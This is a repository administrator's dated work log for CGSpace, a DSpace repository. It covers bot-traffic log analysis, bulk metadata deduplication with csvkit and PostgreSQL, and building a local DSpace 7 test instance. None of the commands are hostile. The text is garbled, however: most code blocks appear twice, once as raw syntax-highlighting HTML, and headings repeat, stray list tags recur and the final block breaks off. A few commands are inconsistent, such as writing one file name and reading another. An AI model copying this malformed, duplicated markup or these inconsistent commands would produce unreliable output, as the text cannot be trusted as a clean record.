1592 GET /handle/10947/2527
1592 GET /handle/10947/34
1593 GET /handle/10947/6
1594 GET /handle/10947/1
1598 GET /handle/10947/2515
1598 GET /handle/10947/2516
1599 GET /handle/10568/101335
1599 GET /handle/10568/91688
1599 GET /handle/10947/2517
1599 GET /handle/10947/2518
1599 GET /handle/10947/2519
1599 GET /handle/10947/2708
1599 GET /handle/10947/2871
1600 GET /handle/10568/89342
1600 GET /handle/10947/4467
1607 GET /handle/10568/103816
290382 GET /handle/10568/83389
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span> 1592 GET /handle/10947/2526
</span></span><span style="display:flex;"><span> 1592 GET /handle/10947/2527
</span></span><span style="display:flex;"><span> 1592 GET /handle/10947/34
</span></span><span style="display:flex;"><span> 1593 GET /handle/10947/6
</span></span><span style="display:flex;"><span> 1594 GET /handle/10947/1
</span></span><span style="display:flex;"><span> 1598 GET /handle/10947/2515
</span></span><span style="display:flex;"><span> 1598 GET /handle/10947/2516
</span></span><span style="display:flex;"><span> 1599 GET /handle/10568/101335
</span></span><span style="display:flex;"><span> 1599 GET /handle/10568/91688
</span></span><span style="display:flex;"><span> 1599 GET /handle/10947/2517
</span></span><span style="display:flex;"><span> 1599 GET /handle/10947/2518
</span></span><span style="display:flex;"><span> 1599 GET /handle/10947/2519
</span></span><span style="display:flex;"><span> 1599 GET /handle/10947/2708
</span></span><span style="display:flex;"><span> 1599 GET /handle/10947/2871
</span></span><span style="display:flex;"><span> 1600 GET /handle/10568/89342
</span></span><span style="display:flex;"><span> 1600 GET /handle/10947/4467
</span></span><span style="display:flex;"><span> 1607 GET /handle/10568/103816
</span></span><span style="display:flex;"><span> 290382 GET /handle/10568/83389
</span></span></code></pre></div><ul>
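
A tally like the one above can be produced from the same nginx logs. A sketch, assuming the default combined log format, where the request method and path are fields 6 and 7 (with a leading quote on field 6):

```console
# zcat --force /var/log/nginx/*.log* | grep 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' | awk '{print $6, $7}' | sed 's/"//' | sort | uniq -c | sort -n | tail -n 20
```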

- Before I purge all those I will ask Samuel Stacey from the System Office to hopefully get an insight...
- Meeting with Michael Victor, Peter, Jane, and Abenet about the future of repositories in the One CGIAR
- Meeting with Michelle from Altmetric about their new CSV upload system

- Extract the AGROVOC subjects from IWMI's 292 publications to validate them against AGROVOC:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;dcterms.subject[en_US]&#39;</span> ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e <span style="color:#e6db74">&#39;s/||/\n/g&#39;</span> -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> | sort -u &gt; /tmp/agrovoc.txt
$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
$ csvgrep -c <span style="color:#e6db74">&#39;number of matches&#39;</span> -m <span style="color:#e6db74">&#39;0&#39;</span> /tmp/agrovoc-matches.csv | csvcut -c <span style="color:#ae81ff">1</span> &gt; /tmp/invalid-agrovoc.csv
</code></pre></div><h2 id="2021-10-05">2021-10-05</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;dcterms.subject[en_US]&#39;</span> ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e <span style="color:#e6db74">&#39;s/||/\n/g&#39;</span> -e <span style="color:#e6db74">&#39;s/&#34;//g&#39;</span> | sort -u &gt; /tmp/agrovoc.txt
</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;number of matches&#39;</span> -m <span style="color:#e6db74">&#39;0&#39;</span> /tmp/agrovoc-matches.csv | csvcut -c <span style="color:#ae81ff">1</span> &gt; /tmp/invalid-agrovoc.csv
</span></span></code></pre></div><h2 id="2021-10-05">2021-10-05</h2>

- Sam put me in touch with Dodi from the System Office web team and he confirmed that the Amazon requests are not theirs
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
...
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 465119
</code></pre></div><h2 id="2021-10-06">2021-10-06</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 465119
</span></span></code></pre></div><h2 id="2021-10-06">2021-10-06</h2>

- Thinking about how we could check for duplicates before importing
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; CREATE EXTENSION pg_trgm;
localhost/dspace63= &gt; SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,&#39;Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines&#39;) &gt; 0.5;
metadata_value_id │ text_value │ dspace_object_id
───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
(2 rows)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; CREATE EXTENSION pg_trgm;
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,&#39;Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines&#39;) &gt; 0.5;
</span></span><span style="display:flex;"><span> metadata_value_id │ text_value │ dspace_object_id
</span></span><span style="display:flex;"><span>───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
</span></span><span style="display:flex;"><span> 3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
</span></span><span style="display:flex;"><span> 3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
</span></span><span style="display:flex;"><span>(2 rows)
</span></span></code></pre></div><ul>

- I was able to find an exact duplicate for an IITA item by searching for its title (I already knew that these existed)
- I started working on a basic Python script to do this and managed to find an actual duplicate in the recent IWMI items
- Then I ran this new version of csv-metadata-quality on an export of IWMI's community, minus some fields I don't want to check:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -C <span style="color:#e6db74">&#39;dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection&#39;</span> ~/Downloads/iwmi.csv &gt; /tmp/iwmi-to-check.csv
$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
$ xsv split -s <span style="color:#ae81ff">2000</span> /tmp /tmp/iwmi.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -C <span style="color:#e6db74">&#39;dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection&#39;</span> ~/Downloads/iwmi.csv &gt; /tmp/iwmi-to-check.csv
</span></span><span style="display:flex;"><span>$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
</span></span><span style="display:flex;"><span>$ xsv split -s <span style="color:#ae81ff">2000</span> /tmp /tmp/iwmi.csv
</span></span></code></pre></div><ul>
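
Note `csvcut -C` drops the named columns rather than selecting them, so a quick way to confirm which columns survived is to list the remaining headers:

```console
$ csvcut -n /tmp/iwmi-to-check.csv
```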

- I noticed each CSV only had 10 or 20 corrections, mostly that none of the duplicate metadata values were removed in the CSVs...
  - I cut a subset of the fields from the main CSV and tried again, but DSpace said "no changes detected"
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]&#39;</span> ~/Downloads/iwmi.csv &gt; /tmp/iwmi-duplicate-metadata.csv
# Copy and blank columns in OpenRefine
$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
$ xsv split -s <span style="color:#ae81ff">2000</span> /tmp /tmp/iwmi-duplicates-cleaned.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]&#39;</span> ~/Downloads/iwmi.csv &gt; /tmp/iwmi-duplicate-metadata.csv
</span></span><span style="display:flex;"><span># Copy and blank columns in OpenRefine
</span></span><span style="display:flex;"><span>$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
</span></span><span style="display:flex;"><span>$ xsv split -s <span style="color:#ae81ff">2000</span> /tmp /tmp/iwmi-duplicates-cleaned.csv
</span></span></code></pre></div><ul>

- It takes a few hours per 2,000 items because DSpace processes them so slowly... sigh...

## 2021-10-08
<ul>
<li>I decided to update these records in PostgreSQL instead of via several CSV batches, as there were several others to normalize too:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2603711
en_Fu | 115568
en | 8818
| 5286
fr | 2
vn | 2
| 0
(7 rows)
cgspace=# BEGIN;
cgspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en_Fu&#39;, &#39;en&#39;, &#39;&#39;);
UPDATE 129673
cgspace=# COMMIT;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
</span></span><span style="display:flex;"><span> text_lang | count
</span></span><span style="display:flex;"><span>-----------+---------
</span></span><span style="display:flex;"><span> en_US | 2603711
</span></span><span style="display:flex;"><span> en_Fu | 115568
</span></span><span style="display:flex;"><span> en | 8818
</span></span><span style="display:flex;"><span> | 5286
</span></span><span style="display:flex;"><span> fr | 2
</span></span><span style="display:flex;"><span> vn | 2
</span></span><span style="display:flex;"><span> | 0
</span></span><span style="display:flex;"><span>(7 rows)
</span></span><span style="display:flex;"><span>cgspace=# BEGIN;
</span></span><span style="display:flex;"><span>cgspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en_Fu&#39;, &#39;en&#39;, &#39;&#39;);
</span></span><span style="display:flex;"><span>UPDATE 129673
</span></span><span style="display:flex;"><span>cgspace=# COMMIT;
</span></span></code></pre></div><ul>
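
Re-running the first query after the `COMMIT` should show the `en_Fu`, `en`, and empty variants folded into `en_US`; a quick verification:

```console
cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
```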

- So all this effort to remove ~400 duplicate metadata values in the IWMI community hmmm:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
391
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
</span></span><span style="display:flex;"><span>391
</span></span></code></pre></div><ul>

- I tried to export ILRI's community, but ran into the export bug (DS-4211)
  - After applying the patch on my local instance I was able to export, but found many duplicate items in the CSV (as I also noticed in 2021-02):
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
32070
$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
19315
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>32070
</span></span><span style="display:flex;"><span>$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>19315
</span></span></code></pre></div><ul>
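
A rough way to collapse those duplicate rows is to keep only the first occurrence of each `id`. This sketch assumes the `id` column comes first and that no field contains quoted commas or embedded newlines (safe for the UUID column itself, but free-text fields could break it):

```console
$ awk -F, '!seen[$1]++' /tmp/ilri-duplicate-metadata.csv > /tmp/ilri-deduplicated.csv
```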

- It seems there are only about 200 duplicate values in this subset of fields in ILRI's community:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
220
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
</span></span><span style="display:flex;"><span>220
</span></span></code></pre></div><ul>

- I found a cool way to select only the items with corrections
  - First, extract a handful of fields from the CSV with csvcut, as shown below
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]&#39;</span> /tmp/ilri.csv | csvsort | uniq &gt; /tmp/ilri-deduplicated-items.csv
$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
$ sed -i -e <span style="color:#e6db74">&#39;1s/en_US/en_Fu/g&#39;</span> /tmp/ilri-deduplicated-items-cleaned.csv
$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv &gt; /tmp/ilri-deduplicated-items-cleaned-joined.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]&#39;</span> /tmp/ilri.csv | csvsort | uniq &gt; /tmp/ilri-deduplicated-items.csv
</span></span><span style="display:flex;"><span>$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
</span></span><span style="display:flex;"><span>$ sed -i -e <span style="color:#e6db74">&#39;1s/en_US/en_Fu/g&#39;</span> /tmp/ilri-deduplicated-items-cleaned.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv &gt; /tmp/ilri-deduplicated-items-cleaned-joined.csv
</span></span></code></pre></div><ul>

- Then I imported the file into OpenRefine and used a custom text facet with a GREL like this to identify the rows with changes:
<pre tabindex="0"><code>if(cells['dcterms.subject[en_US]'].value == cells['dcterms.subject[en_Fu]'].value,&quot;same&quot;,&quot;different&quot;)
<pre tabindex="0"><code>if(cells[&#39;dcterms.subject[en_US]&#39;].value == cells[&#39;dcterms.subject[en_Fu]&#39;].value,&#34;same&#34;,&#34;different&#34;)
</code></pre><ul>
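
The same comparison could also be done from the shell with csvkit's `csvsql`; a sketch, assuming the joined CSV from above and using SQLite's NULL-safe `IS NOT` so rows where one side is empty also count as different:

```console
$ csvsql --tables joined --query 'SELECT id FROM joined WHERE "dcterms.subject[en_US]" IS NOT "dcterms.subject[en_Fu]"' /tmp/ilri-deduplicated-items-cleaned-joined.csv
```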

- For these rows I starred them and then blanked out the original field so DSpace would see it as a removal, and added the new column

- I did the same for CIAT but there were over 7,000 duplicate metadata values! Hard to believe:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
7720
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
</span></span><span style="display:flex;"><span>7720
</span></span></code></pre></div><ul>

- I applied these to the CIAT community, so in total that's over 8,000 duplicate metadata values removed in a handful of fields...

## 2021-10-09

- I did similar metadata cleanups for CCAFS and IITA too, but there were only a few hundred duplicates there
- Also of note, there are some other fixes too, for example in IITA's community:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c -E <span style="color:#e6db74">&#39;(Fixing|Removing) (duplicate|excessive|invalid)&#39;</span> /tmp/out.log
249
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c -E <span style="color:#e6db74">&#39;(Fixing|Removing) (duplicate|excessive|invalid)&#39;</span> /tmp/out.log
</span></span><span style="display:flex;"><span>249
</span></span></code></pre></div><ul>

- I ran a full Discovery re-indexing on CGSpace
- Then I exported all of CGSpace and extracted the ISSNs and ISBNs:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]&#39;</span> /tmp/cgspace.csv &gt; /tmp/cgspace-issn-isbn.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]&#39;</span> /tmp/cgspace.csv &gt; /tmp/cgspace-issn-isbn.csv
</span></span></code></pre></div><ul>

- I did cleanups on about seventy items with invalid and mixed ISSNs/ISBNs
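
To flag obviously malformed ISSNs before eyeballing them, csvkit's regex match with `--invert-match` works; note this sketch over-matches by design, since empty cells and rows holding multiple `||`-separated values fail the pattern too:

```console
$ csvgrep -c 'cg.issn[en_US]' -r '^[0-9]{4}-[0-9]{3}[0-9Xx]$' -i /tmp/cgspace-issn-isbn.csv | csvcut -c 'id,cg.issn[en_US]'
```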
<h2 id="2021-10-10">2021-10-10</h2>

- Start testing DSpace 7.1-SNAPSHOT to see if it has the duplicate item bug on `metadata-export` (DS-4211)
- First create a new PostgreSQL 13 container:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5433:5432 -d postgres:13-alpine
$ createuser -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres --pwprompt dspacetest
$ createdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspace7
$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#39;CREATE EXTENSION pgcrypto;&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5433:5432 -d postgres:13-alpine
</span></span><span style="display:flex;"><span>$ createuser -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres --pwprompt dspacetest
</span></span><span style="display:flex;"><span>$ createdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspace7
</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#39;CREATE EXTENSION pgcrypto;&#39;</span>
</span></span></code></pre></div><ul>
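
Before continuing, it's worth a trivial check that the container accepts connections on the mapped port:

```console
$ psql -h localhost -p 5433 -U postgres -c 'SELECT version();'
```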

- Then edit settings in `dspace/config/local.cfg` and build the backend server with Java 11:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ mvn package
$ cd dspace/target/dspace-installer
$ ant fresh_install
# fix database not being fully ready, causing Tomcat to fail to start the server application
$ ~/dspace7/bin/dspace database migrate
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ mvn package
</span></span><span style="display:flex;"><span>$ cd dspace/target/dspace-installer
</span></span><span style="display:flex;"><span>$ ant fresh_install
</span></span><span style="display:flex;"><span># fix database not being fully ready, causing Tomcat to fail to start the server application
</span></span><span style="display:flex;"><span>$ ~/dspace7/bin/dspace database migrate
</span></span></code></pre></div><ul>
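
The `dspace database info` subcommand prints the Flyway migration state, which is a handy way to confirm the manual `migrate` actually brought the schema up to date before starting Tomcat:

```console
$ ~/dspace7/bin/dspace database info
```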

- Copy Solr configs and start Solr:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
$ ~/src/solr-8.8.2/bin/solr start
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
</span></span><span style="display:flex;"><span>$ ~/src/solr-8.8.2/bin/solr start
</span></span></code></pre></div><ul>

- Start my local Tomcat 9 instance:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ systemctl --user start tomcat9@dspace7
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ systemctl --user start tomcat9@dspace7
</span></span></code></pre></div><ul>

- This works, so now I will drop the default database and import a dump from CGSpace
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ systemctl --user stop tomcat9@dspace7
$ dropdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7
$ createdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspace7
$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -c <span style="color:#e6db74">&#39;alter user dspacetest superuser;&#39;</span>
$ pg_restore -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -d dspace7 -O --role<span style="color:#f92672">=</span>dspacetest -h localhost dspace-2021-10-09.backup
$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -c <span style="color:#e6db74">&#39;alter user dspacetest nosuperuser;&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ systemctl --user stop tomcat9@dspace7
</span></span><span style="display:flex;"><span>$ dropdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7
</span></span><span style="display:flex;"><span>$ createdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspace7
